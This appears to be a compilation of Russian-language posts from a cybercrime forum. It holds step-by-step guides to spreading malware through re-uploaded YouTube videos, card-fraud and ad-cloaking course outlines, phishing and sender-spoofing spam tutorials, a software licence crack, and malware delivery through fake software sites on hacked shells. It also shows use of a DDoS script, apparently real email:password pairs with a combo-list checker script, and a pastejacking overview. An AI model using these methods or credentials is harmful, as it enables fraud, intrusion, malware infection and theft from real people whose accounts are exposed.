Нажимаем загрузить ролик и выполняем следующие действия. Заходим в описание
ролика с которого мы скачивали его видеоматериал , копируем описание и меняем
ссылку на свою , а так же пароль на свой.
Загружаем превью ( Желательно ). Далее во вкладке "Аудитория" выбираем обязательно "Видео не для детей" и "Нет, видео подходит для зрителей младше 18 лет".
Разворачиваем доп.настройки, и продолжаем. НЕ ставим галочку "Видео содержит прямую рекламу, продакт-плейсмент или спонсорский контент". Добавляем тегов(копируем начало тегов из вашего описания, и вставляем) , до ограничения в 500 символов. Язык видео выбираем "Английский" или ток для которого вы делали ролик. Категорию ставим "Игры" и вводим название нашей игры. С заполнением информации закончили. Кликаем два раза "Далее", выбираем параметры доступа "Открытый доступ", и публикуем.
Ролик успешно загружен , осталось заняться накруткой данного ролика.
Накрутка:
Крутить нужно просмотры и лайки , комментарии не обязательно , но они помогут
в продвижении ролика в поисках ютуба. Рекомендую крутить просмотры от 400 до
2000 , от 15 до 200 лайков , и от 12 до 36 комментариев. Если видео неплохо (
по вашему мнению ) приносит вам логов , то продолжаем раскручивать его.
В общем-то это все, хотелось бы добавить:
Никогда не бойтесь использовать живую рабочую силу. Наймите школьников,
которые будут грузить видосы, платите по 20р за видео, вы найдёте кучу
желающих.
Всем спасибо за внимание, обнимаю и советую присмотреться к данному источнику
трафика
Теперь можете открыть свою школотиму
«Поздравляем, вы прошли игру»
Ваш
achobem
1. Вводный
2. Хостинги/IP/Домены. Решение проблем с блоками
3 Работа с Вайтами
4. Личная Классификация прокси и их влияние на запуски
5. Разлоги. 3 эффективных способа решения. Настройка антика
6. Система работы или как перестать биться об стену (на основе алгоритмов гугла)
6. Выбиваем максимальный биллинг с вероятностью 90% на любом Гео
7. Обход 3d secure (двухфакторки) на Банковских картах
8. Влияние тир1, тир2, миксов на запуски. Конкретные Гео для пролива любой вертикали
9. Кмс. Обход фрода по аудиториям/крео/объявлениям
10. Поиск. Обход фрода по вертикалям/ключам/объявлениям
11. Разбор остальных плейсментов
12. Слив всего бюджета (билла) с аккаунта + перекрут за пару часов
13. Работа с саморегами. Отливы за свои. Тестирования
14. Разбор вертикалей и основных направлений в ПП. Куда лить, плюсы и минусы
15. Клоакинг
16. Разбор вопросов в течении всего обучения
Hidden content for authorized users.
You must have at least 3 reaction(s) to view the content.
You must have at least 30 reaction(s) to view the content.
Выдаю личный по запросу!
Данный Слив сделал asif
продажник https://xss.is/threads/29890/
Скачать можно тут
https://dropmefiles.com/Sh***
Password: ***
VT https://www.virustotal.com/gui/file/cb5f8afd6aeb277556719e05627b7*****
Мамка рожала нормальным, но технарем я так и не стал.
Зарабатываю значит я на хлеб генерируя и извращаясь разными идеями по угону
средств с любимых банков США и, бесконечно, по доброму, завидую людям, которые
не такие глупые как мы, в простонародье - "кардеры ". (Но нет, я себя принял
и т.д. не считаю ничтожеством и наслаждаюсь в процессе поиска способов угона
средств с очередной, ранее не известной мне Payroll-системы, или даже общаясь
с безопасником банка о том, почему мне срочно нужен Wire, потому что такой
цены на фонде больше не будет алоо!).
Но, мы работаем с продуктом, а вы (умные) с его разработкой. После, примерно
8-й попытки понять хоть что то в матчасти, прочитать литературу и ПОНЯТЬ
ее, я все понял, если я силен в другом, то мне нужны парни, которые сильны в
той самой матчасти. Ну Чип и Дейл, Инь и Янь , Тимон и Пумба, Бред и Питт.
(Но у меня по прежнему привстает в трусах когда вижу парня в очках, с открытым
Sublime Text на ноуте).
Так вот плавно выходя из продолжительной лирической части я начну, пожалуй, намекать что писал я ее не просто так.
Все же, хоть ты тресни, я хочу много денег, десятки миллионов, просто что бы
были, так спокойней. Я думал когда заработаю сотнитыщ то выдохну и скажу
"хватит, теперь белый бизнес" а хер там, ну я думаю вы знаете. Шлюхи дороже,
яхты длиннее, напитки покрепче, слова покороче, так проще так легче, стираются
ночи..
И перебрав варианты того, чему мне хватит терпения обучится, я выбрал Спам, а
точнее на фишинг. И знаете закружилось-завертелось, визуализация в ход пошла,
снятся инбоксы в gmail-е, наивные юзеры и я, банко-магнат $$$.
Нет на самом деле банально для моих тем работы, нужны гуды банков с овальными
суммами, а учитывая рынок на брут сегодня - ну вы там обалдели с такими ценами
алоо!
Вообщем и сам устал от лирики, вас понял, теперь по делу.
Очень хочу инбоксить, даже в малюсенький обьемах "чисто для себя", но
подскажите степ-бай-степами опытные, а то нерентабельно много времени убиваю
на решение одной микро-задачи.
Пока что я вижу так:
1 * Красивый Фишинг (есть)
_2_* Пачка купленных доменов на каком то GoDaddy ; (есть)
_3_* Мажорная подписка на Mailgun ; (есть)
_4_* Абузоустойчвый хостинг для размещения фишинга?; (не уверен поетому
нет)
_5_* А может с десяток обычных хостингов с моими фишингами?; (частично
уверен, частично есть)
_6_* База отфильтрованных emails; (найду)
И план действий:
Через Mailgun и подключенные к нему мои спам-домены я откручиваю рассылку.
Рандомизирую письма, линки в письмах на свои фишинги (5*),
пока отваливаются мои домены от потока б=БЕШШЕННОГО траффика я уже готовлю
следующие и загружаю на них фишинги, продолжаю рандомизировать письма и линки
в них что бы добиться ХОТЬ КАКОГО ТО инбокса?
Ну я хотя бы верно мыслю? Если вот я такой вот примитивный, не шарю по
рассылке сразу с SMTP серверов и т.д. Вот просто человек хочет быть богатым ну
чего вы докопались аайй..
И второе, возможно есть способ еще проще? Мне кажется только на этапе
бесконечного размножения моих фишингов я встану и выйду, в окно.
Преблагодарен всем кто даст фидбэк, или даст по ~~е*алу~~ , потому что мир
создан что бы мы его любили.
Обнял.
Привет.
Есть у кого крякнутая версия, поделитесь плиз.
А так же интересует вопрос насколько он актуален, может есть что то лучше ?
Доброго времени суток.
Статья написана с целью поделиться с сообществом своим опытом и познакомить с
одним из методов автоматизации отправки сообщений по почте с подменой адреса
отправителя.
В феврале 21-го года, мне было необходимо разослать сообщения по своей базе, я
не имел особых знаний по подмене адреса отправителя и доставлении в инбокс,
так началась Mein Kampf.
Вступление.
Моя база состояла из активных пользователей почтовых сервисов и моей задачей
было закрепиться в Inbox на час, без спама и красной таблички.
Долго капаясь на гитхабе, ютубе, белых и теневых форумах, я наконец-то нашел
софт, он бесплатный https://www.ultimate-mailer.com/download.
Я проверил софт на https://app.any.run/ — никуда не стучит, но все же
рекомендую ставить на VPS или гипервизор.
Для отправки сообщений использовался почтовый сервис seznam.cz
Начало работы.
Запускаем Ultimate mailer.
Во вкладке Servers жмем на плюс.
Переходим к настройке отправки сообщений.
В Блоке General пишем:
Если вы пользуетесь другим почтовым сервисом, то узнать его SMTP можно по запросу в Google: Полное доменное имя службы SMTP (Название сервиса).
В Блоке Authentication пишем Логин@seznam.cz и Пароль от почты и нажимаем кнопку Test снизу.
Должна отобразиться табличка Information, что почта успешно добавлена и готова к работе. Если выдало ошибку, проверяйте правильность введенных данных. Некоторые сервисы требуют разрешение на данный тип подключения как у Google. Ссылка для примераhttps://support.google.com/a/answer/176600?hl=ru
В столбце Settings:
General — Delay: 100
Sender — Дублируем почтовый ящик Логин@seznam.cz
Advanced — Убрать галочки
Во Вкладке Recipients пишем на которую отправим спам-письмо для проверки.
Во Вкладке Subjects жмем на кнопку Import и добавляем .txt файл с заранее заготовленными темами.
Чем больше тем для писем, тем лучше.
Вкладка Header
From:
_Здесь мы указываем почтовый адрес отправителя, от лица которого хотим
отправить письмо.
Внимание, не все адреса можно подделать, обязательно делайте проверку,
отправив письмо на свою почту. Например @paypal.com, @blockchain.com — нельзя
подделать, они автоматически упадут в спам и получат красную табличку.
Блок Reply-To:_
Здесь мы указываем адрес, куда нам ответит жертва, если ответ требуется.
Вкладка Message
Здесь мы вставляем свое сообщение для письма.
Вкладка Preview
_Здесь отображается наше письмо в качестве предварительного просмотра.
Вкладка Checkup
Проверяем письмо на спам-триггеры. У нас отображается, что риск попадания в
спам высокий, из-за подмены отправителя и соответственно получателя. Так же
программа показывает, что у нас в сообщении есть триггер-слова из-за которых
письмо может автоматически попасть в спам. Следуем рекомендациям софта,
изменяем тело письма и слова.
После того как все настроили —Запускаем спамер.
_
Письмо отправлено, идем проверять.
Для примера, я отправил на сервис https://temp-mail.org, вам советую
отправлять для проверки на gmail, так как это самая капризная почта.
Успех, мы получили письмо в Inbox, можно спамить.
Спамер может отослать 300 писем в минуту, однако если отсылать такое
количество со спуфом и редиректом, как у нас будет — КТ.
Мы будем рассылать по 100-150 писем с одной почты.
Для этого добавляем заготовленный текстовый документ с почтами в спамер.
1. Проверять IP на наличие в спам базах https://2ip.ru/spam/
*Пользователи ВПН-сервисов, очень часто занимаются спамом, поэтому ваш IP может быть в базе недобросовестных пользователей. Еще лучше, использовать прокси, софт поддерживает их добавление.
2. Иметь несколько текстов и минимум 30 тем для спама, а так же проверять их на наличие спам слов.
3. Отсылать письма в начале нового часа.
Как показала практика, наши письма Google помещает в спам в ЧЧ:М4, каждого
нового часа, мы должны начать спамить в ЧЧ:М6.
Например:
Cейчас 12:06, мы начинаем спамить по 100 писем с почты.
Проспамили на 10 почтах, уложились в 20 минут. Не зависимо когда было
отправлено письмо, оно улетит в спам в 13:04. Не важно, было оно отправлено в
12:06 или 12:40 — в 13:04 они все будут в спаме.
Наша задача успеть в каждом новом часе закрепиться.
Кто знает, а может и не слышал, есть такой инструмент как MailWizz.
Так вот, кто то покупает (Как я), кто то нет. Плюсы покупки очевидны,
постоянные обновы без каких либо задержек.
Ну топ не был бы топом, если не выложить сам MailWizz (на сегодня, самая
свежая версия 1.9.32)
You must have at least 20 message(s) to view the content.
И конечно куда без лицензии? Лицензя тут идёт по ключу, которая привязывается к домену установку. Но, как всегда есть но.
Hidden content for authorized users.
В файле install\controllers\WelcomeController.php заменить функцию validateRequest на
You must have at least 1 reaction(s) to view the content.
Всем привет , сегодня разберем вариант размута загрузок с гугла.
Что нам потребуется : антик/мобильные прокси/акки/клоака/шеллы/ленд/серт
Антик : Che browser , Indigo browser и другое ( переодически перестает давать
, пробуйте другой антик -благо есть из чего выбирать
https://cpa.rip/services/antidetect-browser/)
Мобильные прокси : Могу рекомендовать только по юсе, что касается EU , да и
вообще MIX, не подскажу, не знаю. Proxyguys.com , эти прокси мобильные
чистые , всё пускает как по маслу )
Ленд : заказать у кодера
Акки гугла : Тут зависит от аппетита и прямых рук) микс дает кред без проблем
на 50 баксов . Топ страны дают 350 ,но акки могут сбривать. Не хотите
вешать креды на акки ? Делайте саморег, вяжите вцц , грейте акк пару недель и
запускайте за свои деньги
Клоака : от себя посоветую hideclick и zeus (везде есть демка неделя-
две,пробуйте) ,есть альтернативы- ищите , да
обрящите))
Шеллы : в раздел купля продажа , нюансы позже.
И так, начнём
Первым делом мы летим на сайт https://www.softwareadvice.com/categories/
(есть альтернативы,ищите) , и смотрим интересующие нас направления) Понятное
дело что большая часть
контор на этом сайте работает в облаке и доступ дается после прохождения
регистрации и указания данных ,которые могут быть нам интересны
(, мыло , ферст ласт, компания, количество сотрудников, в некоторых случаях
даже спрашивают ревенью),
но основу отсюда взять можно.
Выбираем что-то по душе, заказываем фейк. Настраиваем фейк таким образом чтоб
выдача фаила была после прохождения регистрации и ввода антикапчи( необходимо
для того
чтоб гугл не забанил фейк ) делайте выдачу либо после реги, либо отправляйте
на емеил архивом так же после реги.Так же рекомендую красиво настроить
htaccess,
иначе гугл вас спалит быстрее чем вы начнете всё это делать ))) берем
хост+ссл+домен( прячем домен за клаудфаером http://keyof.ru/ в помощь)
Дальше мы покупаем шеллы для выдачи фаила с фейка- делаем выборку по ссл
сертам ( те серты что получаются инстант - по типу lets encrypt не подойдут
-потому что с выдачи фаила с таких шеллов будет вылетать алярма о том что фаил
возможно заражен
-лучше всего подходят серты от комодо и иногда от клаудфаера) ,можно еще сделать выдачу с облака клаудфаера(если не ошибаюсь) cloudfront*. Так же
крайне желательно подписать фаил сертификатом , хотябы обычным- если вы при
деньгах и настроены на серьезные корпы с большим ревеню - не скупитесь на ев
серт
и на более серьезный фейк))))
Дальше летим на биржу фриланса ( если сами не умеете составлять ключи) и
заказываете ворк за 500-1к деревянных) пример kwork.ru , получаем ключи для
рекламы нашего фейка.
После этого берем впску,домен, ссл - ставим клоаку.Настраиваем
блек/вайтлисты.( блек - гугл.ком , вайт - ссылка на фейк).
Дальше берем акки гугла , ставим их на прогрев - я рекомендую брать ип холдера
с которого берете лог и ставить на какую то контору в его городе , через пару
дней меняете
на ссылку клоаки и льете по поисковой выдаче. Второй вариант это заказ
видеокреатива с рекламой вашего софта, на том же кворке можете заказать крутой
видос ) и поставить рекламу
на том же ютюбе с гугла)
Расписал не подробно, кому нужно тот докапается до сути ) ps конторы что я
привожу в пример - не реклама.
pps эта тема подходит не только под гугл , пробуйте) все получится)
Сабж, посоветуйте как можно ускорить получение фавикона ( чтобы Яндекс быстрее проиндексировал домен и в объявлении Директ фавикон показывал ). Ждать неделю- две не вариант, хотелось бы получать его намного скорее.
Всем привет, не сочитите за глупый вопрос, но думаю как грузят локер - через лоадер или сразу сходу ? знающие прошу ответить, заранее всем спасибо.
Привет. Ты спаммер, и ты крут. Ты вершина пищевой цепочки! Бро, я отлично понимаю, что ты спамишь, и зарабатываешь себе на жизнь. И я также понимаю, что у меня нет никакого права тебе это запрещать. Ты можешь, и ты делаешь, а мы, все те, кто не может зафильтровать твой спам, отстой и ламеры. Мы твой корм. И когда ты ебал нас всех по мылу, я молчал. Даже по смс, и эти ебан#е звонки, это ОК. Но жаба, это все, что есть у серьезных людей для общения.. Неужели, блядь, никак без этого не обойтись? Неужели нельзя спамить телегу, вотсап, да похуй что, но не убивать единственный способ связи, откуда ты получаешь всех серьезных партнеров. Да, да, бля, не ты это начал, не ты первый, я все понимаю, но зачем лично ты это делаешь? Если все будут спать в рот твоей матери, неужели ты тоже пристроишься рядом, просто потому, что все остальные это делают? Неужели это не кажется тебе странным?
Ты убиваешь темы, бро. Я понимаю криптолокеры, я понимаю, когда люди делают деньги. Но ты не делаешь деньги, ты говно и отстой, ты собираешь свои копейки с таких же неудачников, как ты сам, потому что не умеешь ничего другого. Куча людей теряет контакты и партнеров из-за тебя, не может накормить свою семью. Ты думаешь, что ты крутой? Да ты говно, был говном, и сдохнешь говном. Есть мыло, где куча тостожопых амеров, где куча бабла, но у тебя не хватает мозгов, чтобы пройти фильтры, и ты задрачиваешь своих же братьев, чтобы заработать копейки, на свою гнилую жизнь. Бог тебе судья. Если человек гандон, то это на всю жизнь. Жаль, но похуй. Я кончил.
Ищу партнёра для совместной покупки лицензии софта telegram-soft (в пм скину
ссылку и детали).
Есть выгодный пакет, если брать на 2-их, сам я в полную мощность юзать не
буду.
Только люди с репой (больше моей
)
Всем доброго времени суток. Есть необходимость спамить по ящикам (Объем менее 0.5 к в сутки), но с опцией подмены отправителя и 100% попаданием через спам лист. Никто не знает более-менее пригодного софта для этого? (Проксей и дедиков - завались, все с чистыми ip, так что проблем вроде как не должно быть с обходом защиты.)P.S Почты паблик, gmail и fr, mail. P.S x2 Админ не пинай, снг не трогаю, онли забугор.
Сабж, не для массовых прогрузов, точеченые смс с подменой отправителя, по ЕУ.
поделитесь, кто знает
спасибо
Может кому-нибудь пригодится мануал по логам.
You must have at least 10 reaction(s) to view the content.
](https://cloud.mail.ru/public/wKE9/eXU6oMJqB)
Посмотрите и скачайте документ
cloud.mail.ru
Всем доброго времени суток,около недели уже ищу софт для трафик нашел только
одну хорошую но из минусов - есть лимит на 6к в день.
а мне бы хотелось как минимум по 20к в сутки.
пробовал
(diabolic/tfs/asist/и боты ноу неймы)
Может кто нибудь поможет и предложит что-то новое,буду блогадарен.
В спаме новичек. Заинтересовался движухой.
Может кто подскажет в какую сторону двигаться(пока скачал тут видеоматериалы,
уроки, буду разбираться)
Суть:
нужно спамить обычный текст+ onion линк, onion линк можно замаскировать так, чтобы он не бился как линк.Click to expand...
в кратце хотелось бы услышать:
Сколько можно писем разослать с свежего мыльника, с свежим соксом?
Есть ли разница разсылать N-писем с 1 мейла с 1 ип или с 10имейлов с 1 и того же ип? Либо лимит будет один и тот же?
Насколько много можно разослать с собственных доменов, допустим если регнуть домен, активировать почту, сколько сообщений можно отправить?
Как отправлять сообщения? Софтом автоматом пачками, либо допустим с 1 мейла по 1 сообщению в минуту(или 200 за раз, раз в 30минут)?
Насколько отличается подход от бига к бигу, hotmail, yahoo, gmail?
Состав письма необходим рандоматизировать по возможности либо можно оставлять статичным? Если рандомить то с какой переодичностью, и допустим хватит ли рандома на каждый мейл отдельно либо текст должен быть индивидуален на всем пуле спама?
Может знаете какой есть софт который может облегчить работу, (необходимый софт) чтобы не изобретать заново велосипед?
Насколько хорошо и какая методика спама с ломаных корпов, есть ли корреляция так что с одного допустим 500 заходит с инбокса остальное в спам, а с другого 20к в инбокс, а не в спам?
**
Заранее спасибо за ответы, буду благодарен ответ даже по одному пункту.**
привет народ!
нужен софт для рассылки сообшений на форумы
если кто имеет такую програмулину и может этим поделится ,
буду оооочень рад!
всем спасибо за внимание.
Из заголовка сабж. Интересуют статы траферов касательно версий браузеров в трафе. Как известно, браузерах фф/хром стоят автоапдейты, однако когда лился у некоторых траферов - в трафе были устаревшие порядком версии и хрома и фф. Вот пытаюсь понять, реальное ли положение дел, что у юзеров не стоят обновы, или попытка нагреть подменой юа?
DDos-Attack-OVH - это простенький python-скрипт для DdoS атаки по HTTP на OVH.
GIT
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F676944662a95eed6807f78866277aa15cb4d453bf50ebfb8bef20064f9e292e0%2FHardyTomas%2FDDos- Attack-OVH-&hash=48d6ab91b7c06d168a1c95614f9de575&return_error=1)
](https://github.com/HardyTomas/DDos-Attack-OVH-)
Powerful DDoS Attack. Contribute to HardyTomas/DDos-Attack-OVH- development by creating an account on GitHub.
github.com
Детальнее:
Нам понадобится установленный Python, а также пару модулей:
Code:Copy to clipboard
pip3 install pysocks
pip3 install bs4
Открываем файл HibernetV3.2.py
и запускаем его. Вводим URL сайта
тут пишем 0(HTTP)
выбираем прокси либо сокс
Процесс:
To install PowerMTA 4.5, you will need to buy a server
with Сentos 6.0 operating system (x86-64 or x64)
Minimum requirements: 1Gb RAM, 10Gb disk,
preferably on SSD. It is also desirable that in the DNS zone of the domain all
the records (type A and MX) necessary for working with this server were
registered .
To work with the server you only need:
Ip адрес сервера
Логин root
Пароль к root
*Additional commands for working with the server
reboot- Restarting the server from the console
Additional commands for working with PMTA:
service pmta reload- Restarting the PMTA config
service pmta restart- Restarting the PMTA
service pmta stop- Stopping the PMTA
pmta pause queue /- Pause sending PMTA
pmta resume queue /- Start sending the PMTA
pmta delete —queue=/- Delete the PMTA distribution queue
Install PowerMTA 4.5:
Download the Putty control console from the official site for working with the server.
Log in using your data to the server.
1. First you need to install the necessary applications on the server. Paste these commands in putti
yum -y install wget
yum -y install unzip
2. Then we upload files to the server to install and configure Pmta:
wget "https://partizanam.ru/cash/pmta-324345-45.zip"
unzip -q pmta-324345-45.zip
3. Download the WinSCP file manager from the official site for working with files on the server.
Go to Settings, select "Settings" at the bottom, select "Panels" and tick "Show hidden files"
4. Open the folder /rootand find the files domains.txtand mailpass.txt
- In the file, domains.txtspecify the domain (s) and ip address (s) of your server.
IMPORTANT: There must be a space between the domain and the IP address. The space should be after the IP address. Also, there should always be another blank line at the bottom.
- In the file, mailpass.txtspecify the password that will be used to create mailboxes.
No spaces or new lines in this file need to be specified!
5. Then proceed to the installation of PowerMTA:
chmod 777 install.sh
./install.sh
6. If the installation was successful, restart the server with the command:
reboot
If errors occur when starting PowerMTA:
1. We are looking for the cause of the service start error:
/usr/sbin/pmtad —debug
2. Find out which process still uses port 2525 and prevents launch:
netstat -tulpn | grep :2525
3. We kill the process interfering with the launch of PowerMTA:
for example:kill 1204
4. Run the PMTA again:
service pmta start
After a successful launch, the PMTA control panel should open at
http://vashdomen.ru:1001orhttp://IpServera:1001
PowerMTA 4.5 Setup:
To configure PMTA, two Files are used: configand virtualhost.txt
They are located in directory /etc/pmta
1. In the file config, first of all, you need to set your company's IP address to access the dashboard. To do this, COPY YOUR IP and replace the characters: 0/0in the 31 and 32 line.
If you leave these lines unchanged, then you can access your dashboard from any IP address. This can be dangerous on the one hand, but on the other hand it’s convenient if you frequently change your IP address.
2. The file virtualhost.txtcontains access to connect the PMTA to programs or scripts for distribution, as well as settings for the distribution domain (s).
3. The installer automatically creates mailboxes for each domain:
A password from the file is used as a password to all mailboxes mailpass.txt.
I have read on so many websites that Marketers/Mailers use symbols and tricks to bypass the Spam Filter. as for the header it plays a huge effects to hit your Mass mailing emails into the inbox. especially those people whom are doing cpa ppc cpc cpm cpl etc.... so likely the Header is this one below as an example :
code :
fromName:-- sxss.is
fromEmail: <contact@[domain]>
subject:--
date:[date]
to:[to]
reply-to:<reply@[domain]>
content-
typeext/html;
anyone has some tricks to the subject line codes/symbols... etc or any other additions to evaluate the header more for a good inbox rate.
Thanks.
xdomains для поиска свободных доменов. полезная вещь для тех кто шлет со своих
впсок
[CLIKE]
](https://mega.nz/#!Mo1VxKbQ!0L5V1GLQR0NO7EPSckfbyPfZtlGVo-9Q0Zln0HVM3Yg)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
[/CLIKE]
Доброго времени суток. Нам в команду нужны траферы по сабжу.
Необходимо будет лить траф на наши лэнды. Подробности и первый контакт в лс.
Всем зелёнки
Привет всем. требуется профи в команду, по настройке и запуску рекламы по adwords. Приложение англоязычное, настройка компании по сша и европе.
пишите в лс
Hidden content for authorized users.
Эту статью я посвящаю человеку, указавшему мне путь: Марио Штраймельвегеру. Кто этот чел? А это завсегдатай mail:pass листов, которые постят отдельные пользователи форумов как илитныя, приватныя с высоким валидом и так далее. Этого самого mario.streimelweger@a1.net там ОЧЕНЬ много. Как и разных других ребят, но особенно его.
Беглый анализ дубликатов показал следующее:
, а раз так, то наверняка где-то ещё.
То есть похоже, что существует какое-то серверное ПО, которое проверяет только первые 8 символов пароля, а дальше можно не слать ничего, либо слать любой мусор. Интерееесно. Попробуем разобраться, что это за ПО.
Bash:Copy to clipboard
nmap -p 993 --script=banner imap.arcor.de
nmap -p 993 --script=banner imap.a1.net
На аркоре нам ничего не дают. На а1 дают следющее:
Code:Copy to clipboard
| banner: * OK [CAPABILITY IMAP4rev1 QUOTA] perdition ready on WARSBL506
|_0003d414
Может хватит и этого. Идём гуглить. perdition - это такой pop3\imap реверс- прокси. Нужен для балансировки нагрузки на сервера. На сайтике говорят что он ходит в базу. Интересно, он ходит туда, чтобы чекнуть креды, или чтоб узнать на какой сервер нам пойти за почтой? В мануале ничего не нашёл. Нужно больше данных.
Решил почекать дубликаты в валиде. По серверам нашлось вот что:
Code:Copy to clipboard
arcor.de
a1.net
aon.at (a1.net)
terra.com.br
homechoice.co.uk
dcsystem.co.za (vox.co.za)
absamail.co.za (vox.co.za)
lantic.net (vox.co.za)
actel.hu (enternet.hu)
hu.inter.net (enternet.hu)
nexgo.de (arcor.de)
vetorial.net
sion.com
tvnetwork.hu
orcon.net.nz
В процессе также выяснилось, что пароли на g2.ru и juno.com регистронезависмые. Для самых маленьких: это значит, что сервер считает, что password, Password, PASSWORD и так далее - один и тот же пароль. Сервера на них определить не получилось.
Пройдёмся NMAPом по серверам, может хоть где-то нам дадут что-то полезное. Так, нигде нам ни про какой perdition не рассказывают. Значит дело не в нём, а точно в сервере. Надо более пристально присмотреться к серверам, на 993 порту нам ничего интересного не говорят, может где-то есть что-то ещё.
Code:Copy to clipboard
...
host imap.homechoice.co.uk
shodan host 212.74.112.80
(так просто быстрее, чем нмапом...)
telnet 212.74.112.80 110
+OK Dovecot ready.
...
telnet 41.193.157.227 143
Dovecot ready
На этот сервак, внезапно, приходит три домена из моего списка
imap.absamail.co.za
imap.lantic.net
imap.dcsystem.co.za
Это сервер африканского телеком оператора https://www.vox.co.za/ Если есть какой-то способ получить все домены ссылающиеся на этот IP, то можно узнать ещё больше доменов подверженных этой хвори. Та же петрушка с серверами imap.actel.hu и imap.hu.inter.net, они оба приходят на ip 62.112.192.45 который принадлежит венгерскому телеком оператору (https://dravanet.hu/), тем не менее c сервером imap.enternet.hu ссылающимся на тот же адрес этот трюк не проходит. Возможно там как раз несколько imap серверов за реверс-прокси, а на них разное ПО, или просто dovecot разных версий. Попытка найти хоть какую- то информацию по проблеме результатов не дала. Рытьё в CVE на dovecot - тоже. Хотя может я просто недостаточно усердно рылся и у вас выйдет лучше.
Вряд ли кому-то здесь надо объяснять, что делать с этими знаниями, но мало ли длины моей статьи будет недостаточно для конкурса. В общем, если вы умеете в брутфорс имап, то теперь вы знаете на каких серверах слабые пароли. Если же вы школьник, то можете генерировать приватныя, илитныя и при этом полностью валидные листы на миллиарды строк из разного мусора. А если работаете с листами, то имейте ввиду, что дубликаты по антипаблику надо чекать не по строке целиком, а по строке с первыми восемью символами пароля в нижнем регистре. Чек просто по мылу - так себе идея, ведь для одного мыла вполне может быть слито несколько паролей и последний как раз валидный. А, точняк. Если вы владелец одного из этих серверов: ран, ран фо ёр лайф, мазафака!
Несколько аккаунтов для проверки:
Code:Copy to clipboard
mario.streimelweger@a1.net:25041983
1234567890@arcor.de:12345678
ortner.k@aon.at:58489588
adecalvio@terra.com.br:ade17150
alexpook@homechoice.co.uk:genesis1
bear0@absamail.co.za:gerhardt
carla1@lantic.net:elituxeb
g.balazs@actel.hu:9xG2a55P
langnora@hu.inter.net:5In3AM7t
forni@vetorial.net:crgf1975
issur@sion.com:g3l1e0i3
magyard1@tvnetwork.hu:Pracli11
smp16@orcon.net.nz:kenneth45
Добавляйте после пароля любой мусор - сервер схавает. Какая именно версия dovecot является "восьмисимвольной" выяснить не получилось. Может дело в комбинации базы и почтовика, или вообще в некорректных настройках - не знаю. Тем не менее проблема, как видите, вполне распространённая. Кстати, можете зарепортить им багу.
PS.
shodan count dovecot
12567131
Хм. Количество символов 4600. Этого явно недостаточно для конкурса, но всё что я хотел я уже изложил. И я старался. Прямо очень старался пожиже всё размазать. Хорошо, тогда давайте вооружимся свежеприобретённым знанием и напишем простейший чекер для mail:pass листов на python.
Python:Copy to clipboard
#!/usr/bin/env python3
from optparse import OptionParser
from tqdm import tqdm #pip3 install tqdm
parser = OptionParser()
parser.add_option('-l', '--list', dest='list',action='store', default='', help="mail:pass list")
parser.add_option('-a', '--anti', dest='apubl',action='store', default='', help="Antipublic file")
parser.add_option('-o', '--output', dest='out',action='store', default='', help="Output file")
options, args = parser.parse_args()
if not options.list:
print('-h для помощи')
exit()
def get_checkline(line):
line = (line.lower()).rstrip()
a = line.split(':')
passw = (a[1])[0:8]
return (a[0]+':'+passw)
mail = set([])
tmpdup = set([])
trash = 0
dupes = 0
with open(options.list,'r', encoding='utf8') as file:
for line in tqdm(file.readlines()):
if ('@' not in line) or (':' not in line):
trash +=1
continue
eml = get_checkline(line)
if eml not in tmpdup:
mail.add(line)
tmpdup.add(eml)
else:
dupes+=1
print('Мусорных строк: '+str(trash))
print('Дубликатов: '+str(dupes))
public = 0
out = set([])
if options.apubl:
apub = set([])
with open(options.apubl,'r', encoding='utf8') as file:
for line in tqdm(file.readlines()):
if ('@' not in line) or (':' not in line): continue
apub.add(get_checkline(line))
for line in mail:
if get_checkline(line) in apub:
public +=1
else:
out.add(line)
print('Паблика: '+str(public))
if len(out) == 0: out = mail
if options.out:
with open(options.out,'w', encoding='utf8') as file:
for i in out:
file.write(i)
Из зависимостей только tqdm (pip3 install tqdm), но можно обойтись и без него, просто удалите строку импорта и все упоминания и у вас не будет красивых консольных прогрессбаров. Под виндой придётся поставить ещё питон третьй версии. Под линухом можно назвать скрипт например mailchecker, положить в папку $PATH сделать "chmod +x mailchecker" и вызывать его просто из терминала не обращаясь к интерпретатору.
Пример работы чекера:
Code:Copy to clipboard
python3 checker.py -l arc/Zabugor.txt -a mail_trash
100%|-----------------------------| 1980148/1980148 [00:05<00:00, 384344.93it/s]
Мусорных строк: 0
Дубликатов: 891433
100%|---------------------------| 10624024/10624024 [00:16<00:00, 633258.85it/s]
Паблика: 750178
Баалин. Всё равно меньше 7к символов. Ладно, допишу в чекер вывод валида в файл.
Это первое, что я написал со времён школьных сочинений. Просьба строго не судить.
не актуально пока
Есть очень жирная почта! ОЧЕНЬ ОЧЕНЬ!! ПОЧТА ОДНОГО ICO !
ЕСТЬ ПАРОЛЬ! НО НЕ ДАЕТ ЗАЙТИ ПРОСИТ ВЕРИФ ЧТО ДЕЛАТЬ?
Есть трафик с адвордса. Ищу схему для конвертации трафика в инсталы. Какую тему продвигать чтобы получить биз установки?
Промокод на +10 ГБ для Я.Диска
[CLIKE]Disk2019[/CLIKE]
Активировать можно здесь с 17 декабря:
https://disk.yandex.ru/tuning
PRICE?
Привет, хацкер, сегодня поговорим про методы атаки на ПК при помощи
Pastejacking.
Ранее, в этой статье я уже упоминал такого рода атаки:
Для некоторых целей атаки были полностью “безфайловые”, в итоге доставлявшие Meterpreter-сессию непосредственно в память.
Click to expand...
Давайте сначала вспомним,что собой представляет атака pastejacking. Ранее
помним,что была такая атака,с задействованием буфера обмена с копированием
зловредной команды с частью кода css. Пока Дилан Эйри не разнообразил такую
атаку и вместо css предложил использовать javascript.
Он и изобрёл тем самым метод, который называется Pastejacking.
Опасность в том ,что не надо копировать в таком случае всё, а достаточно
нескольких символов. Атаковать возможно машины как Windows ,так и Linux.
Первый способ основан на полном использовании javascript, полном копировании
атакуемого содержимого. Браузер жертвы должен не знать о существовании всяких
примочек, позволяющих регулировать javascript.
Следующий способ построен на использовании атрибута span style, должен
работать во многих браузерах. Он не требует включения javascript и достаточно,
чтобы цель скопировала либо весь текст на странице, либо несколько слов. Самое
главное, чтобы вредоносный текст также скопировался.
И крайний метод-это похожий на предыдущий,только текст, абсолютно
немаркируемый. Цель должна скопировать весь текст полностью, но может не
сработать на браузерах Opera и Сhrome.
